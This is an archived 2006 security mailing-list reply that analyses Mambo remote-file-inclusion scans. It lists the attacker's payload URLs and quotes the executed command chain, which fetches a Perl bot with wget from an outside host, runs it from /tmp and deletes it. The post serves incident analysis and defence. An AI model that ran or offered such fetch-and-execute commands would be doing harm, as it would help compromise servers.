Security Incidents mailing list archives
Re: High volume of Mambo scans (perlb0t)
From: Peter Kosinar <goober () ksp sk>
Date: Mon, 15 May 2006 19:26:29 +0200 (CEST)
Hello,
I was looking at the scripts they try to download and it does not looks like a common perl bot (connecting to irc). It's also written in php and by a brazilian person (comments in portuguese) and with a terrible code :) I didn't have time to fully look at it, though. These are the pages they access: http://usuarios.lycos.es/athos666/d25/ http://usuarios.lycos.es/athos666/d25/therules25.dat http://radius01.comete.ci/tool.gif
Actually, the tool.gif file (and the other parts of it) is just the first level of the attack machinery -- it's _the_ PHP script which actually gets remotely included and it understands some simple commands and displays the results in nice form. In this particular case, the interesting argument is "cmd=..." which executes the given command.
As you can see from the remaining portion of the request, the executed compound command in this case consisted of:
1) cd /tmp 2) wget http://radius01.comete.ci/session.gif 3) perl session.gif 4) rm -rf session.* The session.gif file is the Perlbot I and other posters mentioned. Peter -- [Name] Peter Kosinar [Quote] 2B | ~2B = exp(i*PI) [ICQ] 134813278
Current thread:
- Re: High volume of Mambo scans (perlb0t) Jamie Riden (May 14)
- Re: High volume of Mambo scans (perlb0t) Daniel Cid (May 15)
- Re: High volume of Mambo scans (perlb0t) Yuri Slobodyanyuk (May 15)
- Re: High volume of Mambo scans (perlb0t) Peter Kosinar (May 15)
- Re: High volume of Mambo scans (perlb0t) Daniel Cid (May 15)